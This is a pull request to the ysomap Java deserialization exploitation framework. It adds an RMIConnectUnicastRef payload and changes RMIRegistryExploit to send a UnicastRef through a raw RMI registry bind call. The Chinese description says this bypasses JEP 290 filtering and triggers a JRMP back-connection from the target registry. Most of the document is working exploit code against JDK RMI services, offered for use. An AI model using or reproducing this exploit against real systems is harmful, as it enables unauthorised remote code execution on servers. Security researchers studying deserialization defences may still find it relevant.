### PR TITLE
add payload RMIConnectUnicastRef

### DIFF
--- a/common/src/main/java/ysomap/common/annotation/Authors.java
+++ b/common/src/main/java/ysomap/common/annotation/Authors.java
@@ -28,6 +28,7 @@ public @interface Authors {
     String LALA = "lala";
     String KINGX = "kingx";
     String JANG = "Jang";
+    String COKEBEER = "cokeBeer";
 
     String[] value() default {};
 

--- a/core/src/main/java/ysomap/exploits/rmi/RMIRegistryExploit.java
+++ b/core/src/main/java/ysomap/exploits/rmi/RMIRegistryExploit.java
@@ -11,6 +11,8 @@ import ysomap.exploits.rmi.component.Naming;
 import ysomap.exploits.rmi.component.RMISSLClientSocketFactory;
 import ysomap.payloads.Payload;
 
+import java.lang.reflect.Field;
+import sun.rmi.server.UnicastRef;
 import java.rmi.ConnectIOException;
 import java.rmi.Remote;
 import java.rmi.UnmarshalException;
@@ -27,6 +29,7 @@ import java.rmi.registry.Registry;
  *                      RMIConnectWrappedWithProxy、
  *                      RMIConnectWithUnicastRemoteObject
  *                      RMIConnectCustomized
+ *                      RMIConnectUnicastRef
  *                反弹JRMP连接的方式来利用
  * @author wh1t3P1g
  * @since 2020/2/25
@@ -37,6 +40,7 @@ import java.rmi.registry.Registry;
                     "RMIConnectWrapped",
                     "RMIConnectWrappedWithProxy",
                     "RMIConnectWithUnicastRemoteObject",
+                    "RMIConnectUnicastRef",
                     "RMIConnectCustomized"}, param = false)
 @Details("RMI Registry攻击包，允许攻击JDK版本小于jdk8u232_b9的RMI Registry服务。\n" +
         "当前利用需要设置一个payload，其中RMIConnect开头的payload均为后续的RMI反序列化绕过方式。\n" +
@@ -51,6 +55,15 @@ public class RMIRegistryExploit extends AbstractExploit {
     public Payload payload;
 
     public String payloadName;
+
+    private static final long interfaceHash = 4905912898345647071L;
+    private static final java.rmi.server.Operation[] operations = {
+            new java.rmi.server.Operation("void bind(java.lang.String, java.rmi.Remote)"),
+            new java.rmi.server.Operation("java.lang.String list()[]"),
+            new java.rmi.server.Operation("java.rmi.Remote lookup(java.lang.String)"),
+            new java.rmi.server.Operation("void rebind(java.lang.String, java.rmi.Remote)"),
+            new java.rmi.server.Operation("void unbind(java.lang.String)")
+    };
 
     @Override
     public void work() {
@@ -71,13 +84,31 @@ public class RMIRegistryExploit extends AbstractExploit {
                 Object obj = payload.getObject();
                 if(obj instanceof Remote){
                     remote = (Remote) obj;
-                } else{
+                } else if(!(obj instanceof UnicastRef)){
                     remote = PayloadHelper.createMemoitizedProxy(PayloadHelper.createMap(name, obj), Remote.class);
                 }
-                try{
-                    Naming.lookup(registry, remote);
-                }catch (Throwable e){
-                    Logger.error(e.toString());
+                //if obj is instanceof UnicastRef, send it via RemoteCall.invoke
+                //if obj is instanceof Remote, send it via Naming.lookup
+                if(obj instanceof UnicastRef){
+                    Field field = Class.forName("java.rmi.server.RemoteObject").getDeclaredField("ref");
+                    field.setAccessible(true);
+                    UnicastRef ref = (UnicastRef) field.get(registry);
+                    java.rmi.server.RemoteCall call = ref.newCall((java.rmi.server.RemoteObject) registry, operations, 0, interfaceHash);
+                    try {
+                        java.io.ObjectOutput out = call.getOutputStream();
+                        out.writeObject(name);
+                        out.writeObject(obj);
+                    } catch (java.io.IOException e) {
+                        throw new java.rmi.MarshalException("error marshalling arguments", e);
+                    }
+                    ref.invoke(call);
+                    ref.done(call);
+                }else{
+                    try{
+                        Naming.lookup(registry, remote);
+                    }catch (Throwable e){
+                        Logger.error(e.toString());
+                    }
                 }
             }
 

--- a/core/src/main/java/ysomap/payloads/java/rmi/RMIConnectUnicastRef.java
+++ b/core/src/main/java/ysomap/payloads/java/rmi/RMIConnectUnicastRef.java
@@ -1,0 +1,29 @@
+package ysomap.payloads.java.rmi;
+
+import sun.rmi.server.UnicastRef;
+import ysomap.bullets.Bullet;
+import ysomap.bullets.jdk.rmi.RMIConnectBullet;
+import ysomap.common.annotation.*;
+import ysomap.payloads.AbstractPayload;
+
+@Payloads
+@Targets({Targets.JDK, Targets.RMI})
+@Require(bullets = {"RMIConnectBullet"}, param = false)
+@Dependencies({"using to bypass jdk>=8u121", "`UnicastRef` object"})
+@Authors({Authors.COKEBEER})
+public class RMIConnectUnicastRef extends AbstractPayload<UnicastRef> {
+    @Override
+    public boolean checkObject(Object obj) {
+        return obj instanceof UnicastRef;
+    }
+
+    @Override
+    public Bullet getDefaultBullet(Object... args) throws Exception {
+        return RMIConnectBullet.newInstance(args);
+    }
+
+    @Override
+    public UnicastRef pack(Object obj) throws Exception {
+        return (UnicastRef) obj;
+    }
+}


### PR DESCRIPTION
## 改动内容
添加了一个绕过JEP290的RMIConnect类型的payload。
## 适用场景
适用场景为过滤了RemoteObejct但是未过滤UnicastRef的场合
## 实际测试
<img width="1094" alt="image" src="https://user-images.githubusercontent.com/70683161/176148023-4060247c-1cb1-47de-a3e0-386c13a926ec.png">
测试图片中返回了远端的类型异常，但是反连已经发生了